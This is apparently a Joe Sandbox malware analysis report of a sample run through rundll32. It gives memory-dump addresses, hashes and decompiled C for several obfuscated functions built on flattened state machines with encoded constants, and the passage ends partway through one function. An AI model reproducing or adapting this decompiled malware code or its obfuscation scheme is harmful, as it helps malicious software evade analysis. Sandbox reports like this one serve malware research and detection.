0x0034a091
0x0034a098
0x0034a09f
0x0034a0aa
0x0034a0ad
0x0034a0b1
0x0034a0b5
0x0034a0bc
0x0034a0c8
0x0034a0cb
0x0034a0d2
0x0034a0d9
0x0034a0e0
0x0034a0e7
0x0034a0eb
0x0034a0f2
0x0034a0f5
0x0034a0fc
0x0034a103
0x0034a10a
0x0034a111
0x0034a111
0x0034a113
0x00000000
0x0034a114
0x0034a126
0x0034a2d3
0x0034a2d9
0x00000000
0x0034a2d9
0x0034a132
0x0034a1fa
0x0034a200
0x0034a2bf
0x0034a2c6
0x0034a2c8
0x0034a174
0x0034a174
0x0034a111
0x0034a111
0x0034a113
0x00000000
0x0034a113
0x0034a111
0x0034a206
0x0034a20d
0x0034a236
0x0034a236
0x0034a23a
0x0034a23c
0x0034a244
0x0034a24a
0x0034a250
0x0034a273
0x0034a294
0x0034a2a1
0x0034a2a6
0x0034a2ab
0x0034a2ab
0x0034a22c
0x0034a22c
0x00000000
0x0034a22c
0x0034a20f
0x0034a217
0x00000000
0x00000000
0x0034a219
0x0034a220
0x00000000
0x00000000
0x0034a222
0x0034a22a
0x00000000
0x00000000
0x00000000
0x0034a22a
0x0034a13e
0x0034a1af
0x0034a1b7
0x0034a1d7
0x0034a1dc
0x0034a1e7
0x0034a1ed
0x0034a111
0x0034a111
0x0034a113
0x00000000
0x0034a113
0x0034a111
0x0034a146
0x0034a192
0x0034a197
0x0034a199
0x0034a19c
0x0034a19f
0x0034a30b
0x0034a30b
0x0034a30b
0x0034a1a5
0x00000000
0x0034a1a5
0x0034a14e
0x0034a2f9
0x0034a2f9
0x0034a2ff
0x00000000
0x00000000
0x00000000
0x0034a2ff
0x0034a161
0x0034a16c
0x0034a16e
0x00000000
0x0034a16e
0x0034a2eb
0x0034a2f3
0x0034a2f8
0x00000000
0x0034a2f8

Strings

H&!, xrefs: 0034A059
yBd&, xrefs: 00349F86
Up7, xrefs: 0034A01C

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H&!$Up7$yBd&
API String ID: 0-2352930472
Opcode ID: 8bdf4b94a6acf4174d527579c321cd1d74ea4f83dc83504949cfd800135e99bf
Instruction ID: a31ac9e9932c418984ded0b516ccd610463422cf917a7ea798940c8dfe9c69a9
Opcode Fuzzy Hash: 8bdf4b94a6acf4174d527579c321cd1d74ea4f83dc83504949cfd800135e99bf
Instruction Fuzzy Hash: 97E186B1D0021DDBCF29DFE0D98A9EEBBB1FB44314F208159E516BA264D7B41A85CF41

Uniqueness

Uniqueness Score: -1.00%

Function 003595FA Relevance: 4.0, Strings: 3, Instructions: 282
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E003595FA() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				intOrPtr _t295;
				void* _t297;
				void* _t298;
				intOrPtr _t299;
				signed int _t306;
				void* _t309;
				void* _t310;
				char _t311;
				void* _t317;
				intOrPtr _t334;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				void* _t347;

				_v668 = 0xe6fb93;
				_v668 = _v668 + 0xffff1eed;
				_t310 = 0xada6804;
				_v668 = _v668 * 0x61;
				_t309 = 0;
				_v668 = _v668 ^ 0xaca28cc6;
				_v668 = _v668 ^ 0xfb928647;
				_v616 = 0x8caf33;
				_t341 = 0x42;
				_v616 = _v616 * 0x25;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x46546a51;
				_v620 = 0x861136;
				_v620 = _v620 | 0x52f06d4d;
				_v620 = _v620 >> 0xf;
				_v620 = _v620 ^ 0x0000a5ef;
				_v628 = 0x4cf396;
				_v628 = _v628 >> 1;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x0000133c;
				_v684 = 0xc54e58;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0xb8bf25ee;
				_v684 = _v684 >> 2;
				_v684 = _v684 ^ 0x2e259ad3;
				_v592 = 0x68267f;
				_v592 = _v592 + 0xffff39c4;
				_v592 = _v592 ^ 0x006c60f9;
				_v632 = 0xa1d089;
				_v632 = _v632 / _t341;
				_v632 = _v632 ^ 0x52222b14;
				_v632 = _v632 ^ 0x5220bcfc;
				_v608 = 0x39d352;
				_v608 = _v608 | 0x2e7e1ae1;
				_v608 = _v608 ^ 0x576cc274;
				_v608 = _v608 ^ 0x7911cf35;
				_v660 = 0xc26f36;
				_v660 = _v660 ^ 0x9f5dc88a;
				_v660 = _v660 ^ 0xeefda613;
				_t342 = 0x3f;
				_v660 = _v660 / _t342;
				_v660 = _v660 ^ 0x01ce77bb;
				_v624 = 0x334861;
				_v624 = _v624 + 0xffff4b1a;
				_t343 = 0x2a;
				_v624 = _v624 * 0x2f;
				_v624 = _v624 ^ 0x0947e580;
				_v652 = 0xab72b9;
				_v652 = _v652 << 8;
				_v652 = _v652 / _t343;
				_v652 = _v652 ^ 0x0419701b;
				_v688 = 0x507748;
				_v688 = _v688 << 5;
				_v688 = _v688 + 0xffff449a;
				_v688 = _v688 + 0xb858;
				_v688 = _v688 ^ 0x0a0a66f0;
				_v600 = 0x95cabc;
				_v600 = _v600 + 0xffffb185;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0x2af43595;
				_v580 = 0x7e3ec7;
				_v580 = _v580 ^ 0x09caac24;
				_v580 = _v580 ^ 0x09b70662;
				_v612 = 0xa526a8;
				_v612 = _v612 | 0x64dab874;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x0006f9eb;
				_v604 = 0xb7de18;
				_t344 = 0x48;
				_v604 = _v604 * 0x79;
				_v604 = _v604 * 0x31;
				_v604 = _v604 ^ 0xa26ee4e9;
				_v640 = 0x553c00;
				_v640 = _v640 + 0xffff4196;
				_v640 = _v640 + 0xffff8daf;
				_v640 = _v640 ^ 0x00577a07;
				_v576 = 0xaac37;
				_v576 = _v576 * 0x77;
				_v576 = _v576 ^ 0x04fc3a71;
				_v676 = 0xb6ce7b;
				_v676 = _v676 >> 1;
				_v676 = _v676 * 0x28;
				_v676 = _v676 >> 0xb;
				_v676 = _v676 ^ 0x000b20b4;
				_v584 = 0x4877b4;
				_v584 = _v584 << 1;
				_v584 = _v584 ^ 0x009148e9;
				_v588 = 0xaf1c90;
				_v588 = _v588 * 0x5b;
				_v588 = _v588 ^ 0x3e3937c6;
				_v644 = 0x150bb3;
				_v644 = _v644 + 0x865c;
				_v644 = _v644 + 0x5404;
				_v644 = _v644 ^ 0x001dce65;
				_v648 = 0xaa3958;
				_v648 = _v648 / _t344;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x000a9525;
				_v596 = 0xdb2add;
				_v596 = _v596 << 0xd;
				_v596 = _v596 ^ 0x65528fd4;
				_v680 = 0xd04d0c;
				_v680 = _v680 << 5;
				_t340 = _v596;
				_v680 = _v680 * 0x55;
				_v680 = _v680 | 0x96843ebb;
				_v680 = _v680 ^ 0xb7be4a39;
				_v656 = 0x2591b4;
				_v656 = _v656 ^ 0x7517a4f1;
				_v656 = _v656 ^ 0xb20365ef;
				_v656 = _v656 + 0xffff4c4f;
				_v656 = _v656 ^ 0xc733773b;
				_v636 = 0xbfc674;
				_v636 = _v636 * 0x1d;
				_v636 = _v636 << 6;
				_v636 = _v636 ^ 0x6e5b8cbc;
				_v664 = 0x3235cc;
				_v664 = _v664 << 1;
				_v664 = _v664 | 0x857b9d7f;
				_v664 = _v664 * 0x28;
				_v664 = _v664 ^ 0xdbf98c50;
				_v672 = 0xb181ad;
				_v672 = _v672 >> 0xa;
				_v672 = _v672 << 2;
				_v672 = _v672 ^ 0xdb7e6d02;
				_v672 = _v672 ^ 0xdb78e9e9;
				do {
					while(_t310 != 0x10c1a7f) {
						if(_t310 == 0x31db0c0) {
							_t311 = _v572;
							_t295 = _v568;
							_push(_t311);
							_v560 = _t295;
							_v552 = _t295;
							_v544 = _t295;
							_v536 = _t295;
							_v564 = _t311;
							_v556 = _t311;
							_v548 = _t311;
							_v540 = _t311;
							_v532 = _v628;
							_t297 = E00345DDD( &_v564, _t340, _v644, _v648, _t311, _v596, _v680);
							_t347 = _t347 + 0x18;
							__eflags = _t297;
							_t309 =  !=  ? 1 : _t309;
							_t310 = 0x48f7cbb;
							continue;
						} else {
							if(_t310 == 0x461819e) {
								_push(_v660);
								_push(_v608);
								_t298 = E0035DCF7(_v632, 0x341000, __eflags);
								_pop(_t317);
								_t299 =  *0x363e10; // 0x0
								_t334 =  *0x363e10; // 0x0
								E003447CE(_t334 + 0x23c, _v624, _t317, _v652, _v688, _t298, _t299 + 0x1c, _v600, _v580);
								E0034A8B0(_v612, _t298, _v604);
								_t347 = _t347 + 0x24;
								_t310 = 0xa22489e;
								continue;
							} else {
								if(_t310 == 0x48f7cbb) {
									E00351E67(_v656, _v636, _v664, _v672, _t340);
								} else {
									if(_t310 == 0xa22489e) {
										_t306 = E00348F65(_v640, _v576,  &_v524, _v676, 0, _t310, _v616, _v584, _v620, _v588, _t310, _v668);
										_t340 = _t306;
										_t347 = _t347 + 0x28;
										__eflags = _t306 - 0xffffffff;
										if(__eflags != 0) {
											_t310 = 0x31db0c0;
											continue;
										}
									} else {
										if(_t310 == 0xada6804) {
											_t310 = 0xcbcd90e;
											continue;
										} else {
											if(_t310 != 0xcbcd90e) {
												goto L15;
											} else {
												E0035C1EC(_v684, _v592,  &_v572);
												_t310 = 0x10c1a7f;
												continue;
											}
										}
									}
								}
							}
						}
						L18:
						return _t309;
					}
					_v572 = _v572 - E0035ABD1();
					_t310 = 0x461819e;
					asm("sbb [esp+0x8c], edx");
					L15:
					__eflags = _t310 - 0x7e6efe8;
				} while (__eflags != 0);
				goto L18;
			}

0x00359600
0x0035960a
0x00359612
0x00359620
0x00359624
0x00359626
0x0035962e
0x00359636
0x00359645
0x00359648
0x00359651
0x00359655
0x0035965d
0x00359665
0x0035966d
0x00359672
0x0035967a
0x00359682
0x00359686
0x0035968b
0x00359693
0x0035969b
0x003596a0
0x003596a8
0x003596ad
0x003596b5
0x003596bd
0x003596c5
0x003596cd
0x003596dd
0x003596e1
0x003596e9
0x003596f1
0x003596f9
0x00359701
0x00359709
0x00359711
0x00359719
0x00359721
0x0035972d
0x00359732
0x00359738
0x00359740
0x00359748
0x00359755
0x00359756
0x0035975a
0x00359762
0x0035976a
0x00359775
0x00359779
0x00359781
0x00359789
0x0035978e
0x00359796
0x0035979e
0x003597a6
0x003597ae
0x003597b6
0x003597bb
0x003597c3
0x003597ce
0x003597db
0x003597eb
0x003597f3
0x003597fb
0x00359800
0x00359808
0x00359817
0x00359818
0x00359821
0x00359825
0x0035982d
0x00359835
0x0035983d
0x00359845
0x0035984d
0x00359860
0x00359867
0x00359872
0x0035987a
0x00359883
0x00359887
0x0035988c
0x00359894
0x0035989c
0x003598a0
0x003598a8
0x003598b5
0x003598b9
0x003598c1
0x003598c9
0x003598d1
0x003598d9
0x003598e1
0x003598ef
0x003598f3
0x003598f8
0x00359900
0x00359908
0x0035990d
0x00359915
0x0035991d
0x00359927
0x0035992b
0x0035992f
0x00359937
0x0035993f
0x00359947
0x0035994f
0x00359957
0x0035995f
0x00359967
0x00359974
0x00359978
0x0035997d
0x00359985
0x0035998d
0x00359991
0x0035999e
0x003599a2
0x003599aa
0x003599b2
0x003599b7
0x003599bc
0x003599c4
0x003599cc
0x003599cc
0x003599da
0x00359afd
0x00359b06
0x00359b0d
0x00359b0e
0x00359b15
0x00359b1c
0x00359b23
0x00359b32
0x00359b3d
0x00359b49
0x00359b54
0x00359b62
0x00359b69
0x00359b70
0x00359b74
0x00359b76
0x00359b79
0x00000000
0x003599e0
0x003599e6
0x00359a87
0x00359a90
0x00359a98
0x00359a9e
0x00359aac
0x00359ac3
0x00359ad6
0x00359aeb
0x00359af0
0x00359af3
0x00000000
0x003599ec
0x003599f2
0x00359bba
0x003599f8
0x003599fe
0x00359a6d
0x00359a72
0x00359a74
0x00359a77
0x00359a7a
0x00359a80
0x00000000
0x00359a80
0x00359a00
0x00359a06
0x00359a31
0x00000000
0x00359a08
0x00359a0e
0x00000000
0x00359a14
0x00359a24
0x00359a2a
0x00000000
0x00359a2a
0x00359a0e
0x00359a06
0x003599fe
0x003599f2
0x003599e6
0x00359bc5
0x00359bce
0x00359bce
0x00359b88
0x00359b8f
0x00359b94
0x00359b9b
0x00359b9b
0x00359b9b
0x00000000

Strings

QjTF, xrefs: 00359655
HwP, xrefs: 00359781
aH3, xrefs: 00359740

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: HwP$QjTF$aH3
API String ID: 0-3950587752
Opcode ID: f26fb7529b24031913dc0c1d4fe20e6e4b66c241b4638f8feefac939cdae0271
Instruction ID: 0e0d388cf96eb7d94f9932f672dbcfcae93a195f3565f82f442feff73365ebb1
Opcode Fuzzy Hash: f26fb7529b24031913dc0c1d4fe20e6e4b66c241b4638f8feefac939cdae0271
Instruction Fuzzy Hash: 12E11E71409381DFD369CF25C58AA1BBBE1FBC4748F208A1DF6968A260D7B19949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0034B2C7 Relevance: 4.0, Strings: 3, Instructions: 235
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0034B2C7(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v40;
				char _v48;
				intOrPtr _v72;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				void* _t137;
				intOrPtr* _t157;
				signed int _t166;
				void* _t173;
				intOrPtr _t191;
				void* _t203;
				void* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t213;
				void* _t215;
				void* _t216;
				void* _t218;

				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t137);
				_v136 = 0x2c5bc;
				_t216 = _t215 + 0xc;
				_t208 = 0;
				_t173 = 0xf62a13b;
				_t209 = 0x63;
				_v136 = _v136 / _t209;
				_v136 = _v136 + 0xe356;
				_v136 = _v136 ^ 0x000982ba;
				_v156 = 0x35028b;
				_v156 = _v156 | 0x143a760d;
				_v156 = _v156 + 0xfffff236;
				_v156 = _v156 ^ 0x8a3e1055;
				_v156 = _v156 ^ 0x9e033c32;
				_v128 = 0xf43d73;
				_v128 = _v128 | 0xd1983256;
				_v128 = _v128 ^ 0xd1f71de4;
				_v120 = 0x9951cf;
				_v120 = _v120 + 0xffffd11b;
				_v120 = _v120 ^ 0x00948e71;
				_v152 = 0x57fc5b;
				_v152 = _v152 | 0x88a856bb;
				_v152 = _v152 << 9;
				_v152 = _v152 + 0xa27f;
				_v152 = _v152 ^ 0xfff91174;
				_v116 = 0x3d6e6b;
				_t210 = 9;
				_v116 = _v116 / _t210;
				_v116 = _v116 ^ 0x0006b75d;
				_v140 = 0x916f20;
				_t211 = 0x35;
				_v140 = _v140 * 0x22;
				_v140 = _v140 / _t211;
				_t212 = 0x7b;
				_v140 = _v140 * 0x1d;
				_v140 = _v140 ^ 0x0a9423e2;
				_v148 = 0x96f30f;
				_v148 = _v148 ^ 0x6547be83;
				_v148 = _v148 << 9;
				_v148 = _v148 | 0xa101889a;
				_v148 = _v148 ^ 0xa391ec3d;
				_v124 = 0x9e8998;
				_v124 = _v124 | 0x73c531f9;
				_v124 = _v124 ^ 0x73d6e9c9;
				_v132 = 0xda1f74;
				_v132 = _v132 + 0x97a0;
				_v132 = _v132 ^ 0xdacfb227;
				_v132 = _v132 ^ 0xda161b2e;
				_v144 = 0x87027b;
				_t213 = _v128;
				_v144 = _v144 / _t212;
				_v144 = _v144 + 0x3568;
				_v144 = _v144 | 0x38a39b99;
				_v144 = _v144 ^ 0x38a88a96;
				while(1) {
					_t218 = _t173 - 0x628c872;
					if(_t218 > 0) {
						goto L25;
					}
					L2:
					if(_t218 == 0) {
						_push(_t173);
						_push(_t173);
						_t203 = 0x50;
						_t213 = E00347FF2(_t203);
						__eflags = _t213;
						if(__eflags == 0) {
							L16:
							_t173 = 0xe7b6043;
							continue;
							do {
								while(1) {
									_t218 = _t173 - 0x628c872;
									if(_t218 > 0) {
										goto L25;
									}
									goto L2;
								}
								goto L25;
								L45:
								__eflags = _t173 - 0xee0c843;
							} while (__eflags != 0);
							L46:
							return _t208;
						}
						_t173 = 0xf1dea2;
						 *((intOrPtr*)(_t213 + 0x24)) = _v92;
						 *((intOrPtr*)(_t213 + 0x3c)) = _v80;
						 *((intOrPtr*)(_t213 + 0x20)) = _v72;
						continue;
					}
					if(_t173 == 0xf1dea2) {
						__eflags = _v84 - 1;
						if(__eflags == 0) {
							E00354B87( &_v108);
							L13:
							_t173 = 0x4d68783;
							continue;
						}
						_t173 = 0x9ca47b0;
						continue;
					}
					if(_t173 == 0x1c23c86) {
						__eflags = _v84 - 4;
						if(__eflags == 0) {
							E00356DF8( &_v108);
							goto L13;
						}
						_t173 = 0x6a06f56;
						continue;
					}
					if(_t173 == 0x45d7e1c) {
						_t157 = E0035D97D( &_v40, _v120, __eflags, _v152,  &_v48, _v116);
						_t216 = _t216 + 0xc;
						__eflags = _t157;
						if(__eflags == 0) {
							goto L46;
						}
						goto L16;
					}
					if(_t173 == 0x483085d) {
						__eflags = _v84 - 7;
						if(__eflags == 0) {
							E00350E53( &_v108);
						}
						goto L13;
					}
					if(_t173 == 0x4d68783) {
						_t191 =  *0x363208; // 0x0
						_t208 = _t208 + 1;
						 *_t213 =  *((intOrPtr*)(_t191 + 0x20c));
						 *((intOrPtr*)(_t191 + 0x20c)) = _t213;
						L10:
						_t173 = 0x45d7e1c;
						continue;
					}
					if(_t173 != 0x4fb7fc6) {
						goto L45;
					}
					E00350B19(0);
					goto L10;
					L25:
					__eflags = _t173 - 0x6a06f56;
					if(_t173 == 0x6a06f56) {
						__eflags = _v84 - 5;
						if(__eflags == 0) {
							E0034B74D( &_v108, _t213);
							_t173 = 0x4d68783;
							goto L45;
						}
						_t173 = 0xcf2e7b4;
						continue;
					}
					__eflags = _t173 - 0x9a20357;
					if(_t173 == 0x9a20357) {
						__eflags = _v84 - 3;
						if(__eflags == 0) {
							E00351889( &_v108);
							goto L13;
						}
						_t173 = 0x1c23c86;
						continue;
					}
					__eflags = _t173 - 0x9ca47b0;
					if(_t173 == 0x9ca47b0) {
						__eflags = _v84 - 2;
						if(__eflags == 0) {
							E00349714( &_v108, _t213);
							goto L13;
						}
						_t173 = 0x9a20357;
						continue;
					}
					__eflags = _t173 - 0xcf2e7b4;
					if(_t173 == 0xcf2e7b4) {
						__eflags = _v84 - 6;
						if(__eflags == 0) {
							E0034F09B( &_v108);
							goto L13;
						}
						_t173 = 0x483085d;
						continue;
					}
					__eflags = _t173 - 0xe7b6043;
					if(_t173 == 0xe7b6043) {
						_t166 = E0034E5CF( &_v48, _v140,  &_v112, _v148);
						asm("sbb ecx, ecx");
						_t173 = ( ~_t166 & 0x01cb4a56) + 0x45d7e1c;
						continue;
					}
					__eflags = _t173 - 0xf62a13b;
					if(_t173 != 0xf62a13b) {
						goto L45;
					}
					E00343DBC( &_v40, _a4, _v136, _v156, _v128);
					_t216 = _t216 + 0xc;
					_t173 = 0x4fb7fc6;
				}
			}

0x0034b2d1
0x0034b2d8
0x0034b2d9
0x0034b2da
0x0034b2df
0x0034b2e7
0x0034b2f0
0x0034b2f2
0x0034b303
0x0034b308
0x0034b30e
0x0034b316
0x0034b31e
0x0034b326
0x0034b32e
0x0034b336
0x0034b33e
0x0034b346
0x0034b34e
0x0034b356
0x0034b35e
0x0034b366
0x0034b36e
0x0034b376
0x0034b37e
0x0034b386
0x0034b38b
0x0034b393
0x0034b39b
0x0034b3a7
0x0034b3ac
0x0034b3b2
0x0034b3ba
0x0034b3c7
0x0034b3ca
0x0034b3d6
0x0034b3df
0x0034b3e0
0x0034b3e4
0x0034b3ec
0x0034b3f4
0x0034b3fc
0x0034b401
0x0034b409
0x0034b411
0x0034b419
0x0034b421
0x0034b429
0x0034b431
0x0034b439
0x0034b441
0x0034b449
0x0034b457
0x0034b45b
0x0034b45f
0x0034b467
0x0034b46f
0x0034b477
0x0034b477
0x0034b47d
0x00000000
0x00000000
0x0034b483
0x0034b483
0x0034b56e
0x0034b56f
0x0034b572
0x0034b578
0x0034b57c
0x0034b57e
0x0034b520
0x0034b520
0x0034b525
0x0034b477
0x0034b477
0x0034b477
0x0034b47d
0x00000000
0x00000000
0x00000000
0x0034b47d
0x00000000
0x0034b6b6
0x0034b6b6
0x0034b6b6
0x0034b6c2
0x0034b6ce
0x0034b6ce
0x0034b584
0x0034b589
0x0034b590
0x0034b597
0x00000000
0x0034b597
0x0034b48f
0x0034b546
0x0034b54b
0x0034b55b
0x0034b4e6
0x0034b4e6
0x00000000
0x0034b4e6
0x0034b54d
0x00000000
0x0034b54d
0x0034b49b
0x0034b52a
0x0034b52f
0x0034b53f
0x00000000
0x0034b53f
0x0034b531
0x00000000
0x0034b531
0x0034b4a3
0x0034b510
0x0034b515
0x0034b518
0x0034b51a
0x00000000
0x00000000
0x00000000
0x0034b51a
0x0034b4ab
0x0034b4df
0x0034b4e4
0x0034b4ee
0x0034b4ee
0x00000000
0x0034b4e4
0x0034b4af
0x0034b4c8
0x0034b4ce
0x0034b4d5
0x0034b4d7
0x0034b4c4
0x0034b4c4
0x00000000
0x0034b4c4
0x0034b4b7
0x00000000
0x00000000
0x0034b4bf
0x00000000
0x0034b59f
0x0034b59f
0x0034b5a5
0x0034b698
0x0034b69d
0x0034b6af
0x0034b6b4
0x00000000
0x0034b6b4
0x0034b69f
0x00000000
0x0034b69f
0x0034b5ab
0x0034b5b1
0x0034b679
0x0034b67e
0x0034b68e
0x00000000
0x0034b68e
0x0034b680
0x00000000
0x0034b680
0x0034b5b7
0x0034b5bd
0x0034b658
0x0034b65d
0x0034b66f
0x00000000
0x0034b66f
0x0034b65f
0x00000000
0x0034b65f
0x0034b5c3
0x0034b5c9
0x0034b639
0x0034b63e
0x0034b64e
0x00000000
0x0034b64e
0x0034b640
0x00000000
0x0034b640
0x0034b5cb
0x0034b5d1
0x0034b61f
0x0034b62a
0x0034b632
0x00000000
0x0034b632
0x0034b5d3
0x0034b5d9
0x00000000
0x00000000
0x0034b5f9
0x0034b5fe
0x0034b601
0x0034b601

Strings

kn=, xrefs: 0034B39B
V, xrefs: 0034B30E
h5, xrefs: 0034B45F

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: V$h5$kn=
API String ID: 0-2568719763
Opcode ID: 6b1128391bddd59dc0198a2598df844838a7b0b3c4d0643fa4f30f3a0111b614
Instruction ID: a0cc1d2c038795107007c804d81680b9f166aaaeb1eeb3d5942f2a891a631990
Opcode Fuzzy Hash: 6b1128391bddd59dc0198a2598df844838a7b0b3c4d0643fa4f30f3a0111b614
Instruction Fuzzy Hash: D6A18570108340CBC76ACE66D49592FFBE4EB85308F15892EF5968A261D735EA09CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00354116 Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00354116() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t220;
				signed int _t222;
				void* _t224;
				void* _t226;
				void* _t227;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t250;
				void* _t253;
				void* _t258;
				void* _t260;

				_v604 = 0x9b146b;
				_v604 = _v604 | 0x658b3ccc;
				_v604 = _v604 + 0xfffff1f3;
				_v604 = _v604 ^ 0x659b2e62;
				_v596 = 0xb07d39;
				_v596 = _v596 | 0x89b98cff;
				_v596 = _v596 ^ 0x89b9fdfe;
				_v584 = 0x342693;
				_v584 = _v584 ^ 0x5537c6ac;
				_v584 = _v584 ^ 0x5503e03c;
				_v628 = 0x844a73;
				_v628 = _v628 | 0x8aea995b;
				_v628 = _v628 >> 3;
				_v628 = _v628 ^ 0x3316179a;
				_v628 = _v628 ^ 0x224eeca0;
				_v644 = 0xac1c02;
				_v644 = _v644 * 0x6d;
				_t227 = 0;
				_v644 = _v644 << 0xf;
				_t253 = 0x9728f62;
				_t229 = 0x52;
				_v644 = _v644 * 0x23;
				_v644 = _v644 ^ 0xb0e78180;
				_v636 = 0x949b2b;
				_v636 = _v636 / _t229;
				_v636 = _v636 << 4;
				_t230 = 0x48;
				_v636 = _v636 / _t230;
				_v636 = _v636 ^ 0x000805f9;
				_v652 = 0x50f951;
				_v652 = _v652 << 0xe;
				_v652 = _v652 + 0xffff7357;
				_v652 = _v652 >> 5;
				_v652 = _v652 ^ 0x01f330c3;
				_v624 = 0xa7ee55;
				_v624 = _v624 + 0x328f;
				_t231 = 0x36;
				_v624 = _v624 / _t231;
				_v624 = _v624 + 0x3260;
				_v624 = _v624 ^ 0x000caec1;
				_v632 = 0x45b476;
				_v632 = _v632 << 0xf;
				_v632 = _v632 + 0x3fe9;
				_v632 = _v632 + 0xffffc242;
				_v632 = _v632 ^ 0xda30ae70;
				_v576 = 0xb3f46f;
				_v576 = _v576 >> 0xe;
				_v576 = _v576 ^ 0x000becca;
				_v640 = 0x899e10;
				_v640 = _v640 << 3;
				_v640 = _v640 | 0x15c6522a;
				_v640 = _v640 >> 0xc;
				_v640 = _v640 ^ 0x00018fe0;
				_v648 = 0x6b2405;
				_v648 = _v648 | 0xec8a856c;
				_v648 = _v648 + 0xffffe7b2;
				_v648 = _v648 >> 0xd;
				_v648 = _v648 ^ 0x000a0717;
				_v608 = 0xd62f5d;
				_v608 = _v608 + 0xffffa804;
				_v608 = _v608 >> 1;
				_v608 = _v608 ^ 0x00686b18;
				_v580 = 0x2fce72;
				_t232 = 6;
				_v580 = _v580 / _t232;
				_v580 = _v580 ^ 0x000627ef;
				_v612 = 0xa7d19a;
				_v612 = _v612 ^ 0x125f9685;
				_v612 = _v612 ^ 0x35fdcbd7;
				_v612 = _v612 ^ 0x270c67d8;
				_v656 = 0x784491;
				_v656 = _v656 >> 9;
				_v656 = _v656 | 0xfbff7fff;
				_v656 = _v656 ^ 0xfbf9abc9;
				_v616 = 0xc21bdd;
				_t233 = 0x58;
				_v616 = _v616 / _t233;
				_v616 = _v616 | 0xde7eb344;
				_v616 = _v616 ^ 0xde714edb;
				_v620 = 0x22ba29;
				_v620 = _v620 + 0xc334;
				_v620 = _v620 ^ 0x41b5236d;
				_v620 = _v620 ^ 0x4193ad78;
				_v588 = 0x61092c;
				_v588 = _v588 | 0xfbe761ce;
				_v588 = _v588 ^ 0xfbe7142a;
				_v600 = 0xd9609d;
				_v600 = _v600 | 0x95d54fcb;
				_v600 = _v600 ^ 0x95d705b7;
				_v592 = 0xc80f6b;
				_t234 = 0x42;
				_t252 = _v600;
				_v592 = _v592 / _t234;
				_v592 = _v592 ^ 0x0000156e;
				do {
					while(_t253 != 0x25f6a69) {
						if(_t253 == 0x9728f62) {
							_t253 = 0xea70970;
							continue;
						} else {
							if(_t253 == 0x9c0fe90) {
								_t250 = _v632;
								_t220 = E00348F65(_v624, _t250,  &_v524, _v576, _t227, _v624, _v604, _v640, _v584, _v648, _v624, _v596);
								_t252 = _t220;
								_t260 = _t260 + 0x28;
								__eflags = _t220 - 0xffffffff;
								if(__eflags != 0) {
									_t253 = 0xaccbeb9;
									continue;
								}
							} else {
								if(_t253 == 0xaccbeb9) {
